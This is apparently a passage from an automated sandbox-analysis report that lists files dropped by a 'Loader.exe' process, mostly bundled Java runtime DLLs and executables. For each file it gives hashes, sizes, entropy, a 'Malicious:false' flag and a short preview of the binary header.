                                                                                                                                                                                                                                                                                                              SHA-256:B93D0D62436D89C84C66ABBDCF817084A6BA01F7E10053C8F343DF5D53D37536
                                                                                                                                                                                                                                                                                                              SHA-512:716818BBF6E4F21C2A627259F1D35E8375EFEF9C3B197B3AF6E10A4A1735CC643141C32270DF7F6FE25733517BE38CAA09205B98119996237E8EAE6A7D0825A7
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R%^.<v^.<v^.<vW..v\.<vEx.v_.<vEx.v\.<vEx.v[.<v^.=vo.<vEx.vJ.<vEx.v_.<vEx.v_.<vRich^.<v........PE..L....DjW............................|........ ....@..........................`......84....@.................................D#..P....@..h............&..@....P....... ...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...h....@......................@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\servertool.exe

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):15936
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.475447140204412
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:Gps85BnF26emSHhV8QM1eet4SzvBonYPLr7I:GpsGnFjS/8QBetJWC7I
                                                                                                                                                                                                                                                                                                              MD5:43C1D1D0E248604CB3B643C0BDF4EC9A
                                                                                                                                                                                                                                                                                                              SHA1:7BEE9DEB1E43F0FECF0FC57BDFD3F79CF048151F
                                                                                                                                                                                                                                                                                                              SHA-256:165BFF317674BE33F2920320F3EF0957539E5BF149B673C2073DF48FF93A6D94
                                                                                                                                                                                                                                                                                                              SHA-512:CAA9B14DF20FFF92CFC4F9A8557804FBD4CC02831824CD53AEAC7D0EE7918BBD50E22A69AB5FFC9E92A468A5201DF263707D373D60378817DC5FEFDE1ABC48BF
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R%^.<v^.<v^.<vW..v\.<vEx.v_.<vEx.v\.<vEx.v[.<v^.=vo.<vEx.vJ.<vEx.v_.<vEx.v_.<vRich^.<v........PE..L....DjW............................|........ ....@..........................`.......t....@.................................D#..P....@..h............&..@....P....... ...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...h....@......................@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\splashscreen.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):177216
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.909590121652277
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:L9Wyo+Jyru3w8WqWnJjOUrI7vh+Dug9PVWU+kmaVE9TBfQiJ8:BWyPsi34i+DugFj+kmaVE9TB4/
                                                                                                                                                                                                                                                                                                              MD5:8DC2356E3FF3A595AEDE81594A2D259A
                                                                                                                                                                                                                                                                                                              SHA1:A05E05E9EA8FB0C8928112CA931EB4F5E977B92A
                                                                                                                                                                                                                                                                                                              SHA-256:B9DE5D3ABBC0AC956E7F590E4C8507FF570B6C353374BB80F413B5846CE322FE
                                                                                                                                                                                                                                                                                                              SHA-512:D5C83EBDB7192DD361856B236A07AFD4FF95E68E0036396D68A3407ED680D4A36EC857AB101DBA5F583AA67CC45A2835178DAC84A68472C7F619EFA674FE51F0
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................8h....z.l.....8j.....8_......_......g.......h....8^......8o.....8n.....8i....Rich...........................PE..L...pPjW...........!...............................o......................................@.........................`...........P.......................@...........`...................................@...............D...|...@....................text............................... ..`.rdata..]...........................@..@.data....1..........................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\ssv.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):473152
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.475991416072106
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6144:ngmgmb+p19k+j4QJKFDSha+IJ6NyLu/wtAWvrMZp5WMuBzj:n17bsj4QJlha+XNyLu/iAWvhBzj
                                                                                                                                                                                                                                                                                                              MD5:79CFE207E05F771E29847573593F6DE1
                                                                                                                                                                                                                                                                                                              SHA1:34DFA813802C6F5A57A557BF72B2B306F8042E90
                                                                                                                                                                                                                                                                                                              SHA-256:AEB27727F428116069944BB92B477D7487C9DEB3921E1005814536459E35222F
                                                                                                                                                                                                                                                                                                              SHA-512:2C71A827BB156BD012BE20B30D701D5123D8B6C7889D4F4A47A483D3477C25BF224E7F205CA9FCCB08DA0A2EF28AF6433D018A0E555BCE911C31A5F462F41578
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@.....@..@..@..4@..@.u2@..@.u.@..@../@..@..?@..@..@:.@k..@..@.u.@\.@.u7@..@.u6@..@.u1@..@Rich..@........PE..L...pPjW...........!.....^..........r .......p.....o.........................p............@.........................@D.......+...........s........... ..@.... ..H6...t..................................@............p.......).......................text...\\.......^.................. ..`.rdata.......p.......b..............@..@.data....I...P...*...8..............@....rsrc....s.......t...b..............@..@.reloc...H... ...J..................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\ssvagent.exe

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):52800
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.367562931371078
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:0UD9dxWf4b4UoY6sUsaJ2sQ7O+phclByW3T9KMDbgz2dN6lDb/9/YMw0c3D6QsTY:0IofovBbS9KMvHR0cz6QsTPOXm2BT9j7
                                                                                                                                                                                                                                                                                                              MD5:F434A8AC7F1C8C0E2587B9A9F30E397B
                                                                                                                                                                                                                                                                                                              SHA1:BD62E10E44117A60EB4180412112593D9460299D
                                                                                                                                                                                                                                                                                                              SHA-256:6A994B389B8F7109238DE6F230B1B540186ED2EC8D081C7601C6996863AA4DC8
                                                                                                                                                                                                                                                                                                              SHA-512:9896DAC36BD4F7289C7701B75AD8EB9F7ACD233384075A3FBA6E6F2F38E420F37C1A29317EEEA3C4DDBA1791F6F17187DD5BDFDD9F98F095E7D4DF20C0D5EA3E
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Hi.m...>...>...>..u>...>.Fq>...>..w>...>..C>...>.pj>...>.pz>...>...>...>c~B>...>..B>...>..s>...>..t>...>Rich...>........PE..L....HjW.................f...R.......i............@.................................._....@.....................................x.......................@.......X...@...............................P...@...................`........................text....e.......f.................. ..`.rdata...5.......6...j..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\sunec.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):123968
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.699694377005066
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:jWi/SLhxEJKv0O4+zwtKg3HquHB2u0YUdRXGCDilgKptxG0ULtt1vtxgl0IlgqA2:+vdtg6ZYUniPe5vtxgl0IlgqA2
                                                                                                                                                                                                                                                                                                              MD5:0BAB62A0CF67481EA2A7F3CAFD7C5144
                                                                                                                                                                                                                                                                                                              SHA1:D6B010C815F4D9C675DF918B615FE0AAE45249EA
                                                                                                                                                                                                                                                                                                              SHA-256:FC57682FDBCA50FAEBFC6B4F5D199FC407A541C110C15F0C850503006D32301A
                                                                                                                                                                                                                                                                                                              SHA-512:0128813DE247246BF4AECE1B222B6611E5AE1EDE01A1B339CFE0F98184739D7A066DAE4F1A271F544BB39F9B79F053F4B96F2E471B9444C29855CF52FB7835CB
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y..@=..=..=..4.1.?....:.<..&G>.>..=.....&G<.:..&G..>..&G.....&G9.<..&G8.<..&G?.<..Rich=..................PE..L...qPjW...........!.........................0.....p......................................@.........................p...:...\...<.......................@............0..................................@............0...............................text............................... ..`.rdata.......0......................@..@.data...............................@....rsrc...............................@..@.reloc..>...........................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\sunmscapi.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):25664
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.488681310308951
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:GxZ2v7Oc56lspQEgde9M3z27lFOJIjkzIPV5yKlWFKbKwnYPLr7Wo5L:Xr5PQEOe9MD4lFhjk8ddeKWwC7dL
                                                                                                                                                                                                                                                                                                              MD5:039AD8A7A4B14C321F156878838A2340
                                                                                                                                                                                                                                                                                                              SHA1:6AD9D2FBA988193D16E7B3278C0D0757AB99B3EF
                                                                                                                                                                                                                                                                                                              SHA-256:ED3AD7EBA989FB31C2ABC3220694D1446D33659782CB1B333318EC54A577389D
                                                                                                                                                                                                                                                                                                              SHA-512:7D5B8C191A7D0C4FEDB831DE197A3CB5DC0564AD3F2E57EEE8C506B2308B656D2F0FE086D508FAB8F03CA0E1B0574E708728373DFA3116C9B9FC5DFDB72FEE46
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........O.............................;......V...............:..........................Rich....................PE..L...rPjW...........!.....(..."......h2.......@.....p.................................3....@.........................`O.......G..d....p...............L..@...........PA..............................8D..@............@..4............................text....&.......(.................. ..`.rdata..8....@.......,..............@..@.data...`....`.......B..............@....rsrc........p.......D..............@..@.reloc..^............H..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\t2k.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):195136
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.80727029211823
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:fmtIwyq6lFq857zCYLFYEVothL10xYOXjV5qECVTHLy71vJ2qIcWYEfQQxIYh5t+:mIwyqM7qYLVVIqhfqfTm1W+Tws
                                                                                                                                                                                                                                                                                                              MD5:E1904A4B2D6F657B9FEF053893FE3C41
                                                                                                                                                                                                                                                                                                              SHA1:59AC965A1029AE936DDD5AE623A9A025D49737EC
                                                                                                                                                                                                                                                                                                              SHA-256:5929E3510F67FEAE073B8995BFC542FD7A0626F57D2FBC829EFC95206DF8F85F
                                                                                                                                                                                                                                                                                                              SHA-512:C0A60928299EA2E6DC8AD1E3DE9CEF77C8E520585F8D73BD7F56E33705D1A2AEC04AE9C01A8069AE5A0D71F28AEF42F4A260CF4D5BB44A95DCEB70E5C8DB8FEA
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......`.zS$...$...$...-..&...?>..'...?>..!...$.......?>.. ...?>......?>..%...?>..%...?>..%...Rich$...................PE..L...pPjW...........!.....f...........p.............p......................... .......]....@.............................f...\...P.......................@...............................................@............................................text....e.......f.................. ..`.rdata..v[.......\...j..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\tnameserv.exe

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):16448
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.392776971200692
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:GpssZwnvNmc6DDmSHhV8Ogee1cGPnYPLr7fl:GpssqnFm16S/8OVeLC7fl
                                                                                                                                                                                                                                                                                                              MD5:7624A9B769CDCF3A75FE5A9FEAADD61F
                                                                                                                                                                                                                                                                                                              SHA1:9269968968CD63D6E1ECC14F78B9A630FCC26FBE
                                                                                                                                                                                                                                                                                                              SHA-256:41F9A804C888A58DECDE2B63A544DBFF536B40D87CECED197E1A14050858C0DA
                                                                                                                                                                                                                                                                                                              SHA-512:1AF7BB30E1FC7600AD0A209DB4E077DAB9CEAA5C4332F8B1353ED0DB7EA71B4A9B7D126E756B634D3FB22618E39AFC5ED52263C88E9F7646EAABB0D9240E382B
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R%^.<v^.<v^.<vW..v\.<vEx.v_.<vEx.v\.<vEx.v[.<v^.=vo.<vEx.vJ.<vEx.v_.<vEx.v_.<vRich^.<v........PE..L....DjW............................z........ ....@..........................`......n.....@..................................#..P....@..\............(..@....P....... ..............................."..@............ ...............................text............................... ..`.rdata..J.... ......................@..@.data........0......................@....rsrc...\....@......................@..@.reloc.......P.......&..............@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\unpack.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):65600
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.461111208462538
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:lVeogiQWo3IzLIoDY9p6K/sdDAZ5e1x3afX:veDib4oDu4K/sdDAZ5CxEX
                                                                                                                                                                                                                                                                                                              MD5:806580640A68234A711D3BB0642130A7
                                                                                                                                                                                                                                                                                                              SHA1:1EDF20DAAC15FE90E9891E95130D0DD70D005B62
                                                                                                                                                                                                                                                                                                              SHA-256:CCCC2A9F54E4F5961DD45DAA1F6C97ECFB156EA8E0DF82277A2C109EA4D2E036
                                                                                                                                                                                                                                                                                                              SHA-512:0AAC087449DEECBB1CFAEE5C3144500CDC4C1D209D1F1F7D8EB41DD7870504BF71D0CC9AE7761BFC609F42273B7FB3CA7801AA54FB0E92BC71C41CC5CAECD31C
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D.H%..H%..H%..A]).J%...k".I%..S.$.L%..S...D%..S.&.O%..H%..w%..S...A%..S.!.I%..S. .I%..S.'.I%..RichH%..........PE..L...pPjW...........!.........L.....................p......................... .......<....@.........................`...........d.......................@...........................................P...@............................................text............................... ..`.rdata..q-..........................@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\unpack200.exe

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):159296
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.019927381236816
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:9vFy5zbJEQFFB9AYeb11tzTQrTBfYEaf9zQ6NlUlh5:7iFry3b11twTBgEaf9zQ6Nc
                                                                                                                                                                                                                                                                                                              MD5:C15F0FE651B05F4288CBC3672F6DC3CE
                                                                                                                                                                                                                                                                                                              SHA1:FFCE84FE532B41F31CDDC41C84024FAFE6BC30E6
                                                                                                                                                                                                                                                                                                              SHA-256:869DC4D40444F10325057B0CC3BB7EA48942DD712DF8A1AE331A554FF0397F1A
                                                                                                                                                                                                                                                                                                              SHA-512:E9E27C4C68972E3250B380C1A5D5EB02BEC03028D389234A44A7D56974BFA233D177173F929BDB6FF877AE17A529D85D384684B0037E260A0143F7A95A0204C6
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ar.:%..i%..i%..i,kKi'..i.]@i&..i>.Di&..i%..in..i>.Fi ..i>.ri8..i>.si,..i>.Bi$..i>.Ei$..iRich%..i........PE..L....DjW..........................................@..................................c....@..................................p..<....................V..@........... ...............................@6..@............q...............................text............................... ..`.rdata.............................@..@.data........P.......(..............@....idata..D....p.......8..............@....rsrc................B..............@..@.reloc...............J..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\verify.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):39488
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.751057397220933
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:Okt1MVMrA9/Klzwz9UyCgMUt9onPs3h3nVt83OndMY7dmMpAnC70N:Oo1oMQ/CrPa3VWO+gdmMW6q
                                                                                                                                                                                                                                                                                                              MD5:DE2167A880207BBF7464BCD1F8BC8657
                                                                                                                                                                                                                                                                                                              SHA1:0FF7A5EA29C0364A1162A090DFFC13D29BC3D3C7
                                                                                                                                                                                                                                                                                                              SHA-256:FD856EA783AD60215CE2F920FCB6BB4E416562D3C037C06D047F1EC103CD10B3
                                                                                                                                                                                                                                                                                                              SHA-512:BB83377C5CFF6117CEC6FBADF6D40989CE1EE3F37E4CEBA17562A59EA903D8962091146E2AA5CC44CFDDDF280DA7928001EEA98ABF0C0942D69819B2433F1322
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W.d....]...]...]...]...].H.]...].H.]...].H.]...]...]_..].H.]...].H.]...].H.]...].H.]...]Rich...]........................PE..L...pPjW...........!.....N...4.......W.......`.....p................................*k....@.................................<x..P.......................@...........Pa...............................v..@............`..<............................text....L.......N.................. ..`.rdata..e!...`..."...R..............@..@.data...(............t..............@....rsrc................v..............@..@.reloc...............z..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\w2k_lsa_auth.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):21568
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.4868701533420925
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:uVI9/tEAHVvfiqiW9LEiGTHb6hVXbS7fLsD5bGGNET7T7T7T7JyFoynPV5hgGLVt:uVI9/yA9f1iW9LEiGTHb6hVXbS7QbGG9
                                                                                                                                                                                                                                                                                                              MD5:7C2959F705B5493A9701FFD9119C5EFD
                                                                                                                                                                                                                                                                                                              SHA1:5A52D57D1B96449C2B40A82F48DE2419ACA944C3
                                                                                                                                                                                                                                                                                                              SHA-256:596F89E7E5D9AC2B1F97FA36A20A7405C1CC41A9FCBA96DB089ADA4550131B24
                                                                                                                                                                                                                                                                                                              SHA-512:B7B48BD14701F75B9018BEDEE5A4CFCEBDAC342F83339FB3F1EFB7855598474C9D1CC993B5D4ADD3326140435087D2BD7CBBC18BC76C64EAD6234A9A7D57C552
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D..3..`..`..`.E.`..`.E.`..`.E `..`...`..`..`2.`.E!`..`.E.`..`.E.`..`.E.`..`Rich..`........................PE..L...pPjW...........!.........".......#.......0.....p.................................h....@.........................@B.......<..x....`...............<..@....p.......0...............................;..@............0...............................text............................... ..`.rdata..6....0......................@..@.data........P.......2..............@....rsrc........`.......4..............@..@.reloc..&....p.......8..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\wsdetect.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):163904
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.508553433039132
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:onzJtwzsrYx6cY+90AiVrM5muIqltkt7maRoM/X1fJqO0NJT:onttwzsrYxTaVVY5muIq3mx/X1fcb
                                                                                                                                                                                                                                                                                                              MD5:A63387A1BFDF760575B04B7BFD57FF89
                                                                                                                                                                                                                                                                                                              SHA1:9384247599523D97F40B973A00EE536848B1D76F
                                                                                                                                                                                                                                                                                                              SHA-256:5DF5B7E6EFCC345DDC8448AFC707B666F5F696F554B00ACA64D8E23EDBC176BF
                                                                                                                                                                                                                                                                                                              SHA-512:CB3A6A394424345FFA076E0BE58F284A0E4DB6FBFCE02D93FB4871D350A7FA1E673175AE988C26453DB1C983C0D06A01DD413DE47031BB4BF308CAAF3513C36F
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........5...T.^.T.^.T.^..)^.T.^../^.T.^...^&T.^.".^.T.^.,2^.T.^.,"^.T.^.T.^MT.^...^.T.^..*^.T.^..+^.T.^..,^.T.^Rich.T.^................PE..L...rPjW...........!...............................p......................................@.................................D........p..P............h..@.......d...................................P...@.......................@....................text............................... ..`.rdata...d.......f..................@..@.data...`@... ..."..................@....rsrc...P....p.......(..............@..@.reloc..~/.......0...8..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\zip.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):69696
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.89860109289213
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:ZCghp1EJqcGdjandlraksIOwIOpVnToIft4tpgO6:/142jUhimp9TBft4tqO6
                                                                                                                                                                                                                                                                                                              MD5:CB99B83BBC19CD0E1C2EC6031D0A80BC
                                                                                                                                                                                                                                                                                                              SHA1:927E1E24FD19F9CA8B5191EF3CC746B74AB68BCD
                                                                                                                                                                                                                                                                                                              SHA-256:68148243E3A03A3A1AAF4637F054993CB174C04F6BD77894FE84D74AF5833BEC
                                                                                                                                                                                                                                                                                                              SHA-512:29C4978FA56F15025355CE26A52BDF8197B8D8073A441425DF3DFC93C7D80D36755CC05B6485DD2E1F168DF2941315F883960B81368E742C4EA8E69DD82FA2BA
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........H....................2.................4.....................5.............................Rich............PE..L...pPjW...........!.........h.....................p.........................0......V.....@.................................L...d.......................@.... ..X...0...................................@............................................text............................... ..`.rdata..wV.......X..................@..@.data...............................@....rsrc...............................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\accessibility.properties

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):155
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.618267268558291
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:nSkoZgZLXnuWxVEsTwVAAiuKIn7IRAdSPGGzJ0vwQAnfMaAHCRyvy:nBcAPWEwVAkIiSPhwwpkaAHCIa
                                                                                                                                                                                                                                                                                                              MD5:9E5E954BC0E625A69A0A430E80DCF724
                                                                                                                                                                                                                                                                                                              SHA1:C29C1F37A2148B50A343DB1A4AA9EB0512F80749
                                                                                                                                                                                                                                                                                                              SHA-256:A46372B05CE9F40F5D5A775C90D7AA60687CD91AAA7374C499F0221229BF344E
                                                                                                                                                                                                                                                                                                              SHA-512:18A8277A872FB9E070A1980EEE3DDD096ED0BBA755DB9B57409983C1D5A860E9CBD3B67E66FF47852FE12324B84D4984E2F13859F65FABE2FF175725898F1B67
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:#..# Load the Java Access Bridge class into the JVM..#..#assistive_technologies=com.sun.java.accessibility.AccessBridge..#screen_magnifier_present=true....

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\calendars.properties

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
